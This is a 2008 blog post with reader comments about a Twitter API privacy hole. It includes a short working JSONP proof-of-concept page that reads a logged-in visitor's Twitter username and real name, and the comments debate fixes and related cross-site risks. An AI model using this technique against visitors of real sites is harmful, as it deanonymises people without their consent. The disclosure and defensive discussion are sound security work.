Dec 31
Not just social history, actual information from Twitter
Security, Tech with tags: twitter
Add comments
<html>
<head>
<script>
document.write("This page should show you your twitter info if you're logged in. (If you see a login box make sure you're logged into Twitter)<br/><br/>");
// forgive the document.write ugliness
function orly(data)
{
document.write("Your username is "+data[0]['user']['screen_name']+"<br>");
document.write("Your real name is "+data[0]['user']['name']);
}
</script>
<script src="http://twitter.com/statuses/user_timeline.json?count=1&callback=orly"></script>
</head>
<body>
</body>
</html>What is that is all it took to grab your username and even real name out of Twitter? Try it, it works.
Yowser?!
(via Bill Zeller)
December 31st, 2008 at 9:58 am
There is a lot of info in there including lat/long if the user uses a location aware twitter client.
Simple fix would be to send only a json object back. Instead of the orly function call.
December 31st, 2008 at 10:43 am
I noticed this when Dion linked to “My First Follow”:
http://dcortesi.com/tools/my-first-follow/
(it’s how they determine your username).
That site doesn’t appear to be doing anything malicious with your data, but any site you visit could identify your twitter username or your real name, if you’ve set it.
December 31st, 2008 at 1:21 pm
@Jason: Sending a JSON object back instead of using the JSON-P callback wouldn’t change anything — the same information would be exposed, it’d just be *slightly* more difficult to retrieve. The “fix” would be to not have API methods that return the current user’s information without needing an ID provided.
Or, rather, the fix would be to move to *not* using HTTP auth. As it is, any page on the ‘net can do things like post a new tweet, or send a direct message, or update your profile…
December 31st, 2008 at 2:18 pm
The fix is to return back just the JSON and enclosed in a JavaScript comment, or a while (true) loop or prefixed with throw. This is a problem with any web auth API that returns JSONP. XMLP on the other hand … :)
December 31st, 2008 at 3:56 pm
I agree with David. Isn’t this simply a consequence of Twitter having a ridiculous API? HTTP-Auth, no remote keys for 3rd party use, etc etc.
I have no idea how this could be fixed by returning the data in a different format. Data is data, right?
December 31st, 2008 at 5:06 pm
Is this article + comments about Twitter having a useful API or an unsecure API? If its the latter then I disagree. The data is publically available on the html page so why not make it accessible via a JSON+callback API? If twitter don’t provide the API then any one can still write their own server-side API to do the HTML parsing.
Sorry if I’m confused about some unspoken error of publishing otherwise public data via an API. Is this bad/wrong/evil?
December 31st, 2008 at 7:18 pm
@David I haven’t seen a working case of json object hijacking. Json array hijacking, yes, but only in firefox 2.
@dave wrapping output in comments is considered more dangerous as any arbitrary script could be injected. See d crockford for details.
@drnic the issue is privacy. All your twitter info is available to any site without your knowlege.
January 1st, 2009 at 1:05 pm
@Jason: Hijacking isn’t the problem — it’s all public data, after all. The problem is that Twitter’s API lets sites request it without needing to know anything about you. They can send an API request that will return your twitter name if you’re logged in.
The secondary issue is that, knowing that you’re logged in, they can then use that same API to change your twitter account.
I feel that the way to solve this problem is twofold:
(a) don’t have methods that return information based on the currently logged in user
(b) switch to a non-HTTP Auth method of determining the current user. (I.e. an API method that provides a session-key that has to be used to interact with any of the authentication-required methods.)
January 1st, 2009 at 8:53 pm
I was surprised to see Twitter allowed this as well when I created the firstfollow thing on dcortesi.com.
re: being able to change somebody’s Twitter account:
You’ll notice if you try to access any methods that contain private data (replies,dm’s) or update the account, Twitter requests authentication. Granted it’s not tough to get people to put in their password (as I showed with my twitter awesomeness site, heh).
The other problem is that if somebody _does_ auth to the “API” at any point in a browsing session, another site could gain access to that private data as the browser caches basic auth credentials.
I do also agree that this is a fairly significant privacy leak and one of the reasons I browse with the NoScript extension.
January 3rd, 2009 at 1:19 pm
Hmmm interesting
I guess we always have to expect bugs like that, it wasen’t the firs and it will not be the last bug…
January 4th, 2009 at 2:38 pm
@jason a link to any articles by crockford on that subject would be good. AFAIK as long as the returned data is in comments it cannot be hijacked nor is there any callback function so you are as safe as you are gonna get.
January 5th, 2009 at 9:58 am
@Dave Johnson
Crockford’s reply in the comments
http://tedhusted.wordpress.com/2007/04/10/fortifying-ajax/
Dojo also removed support for comment prefixing in their last release due to the same vulnerability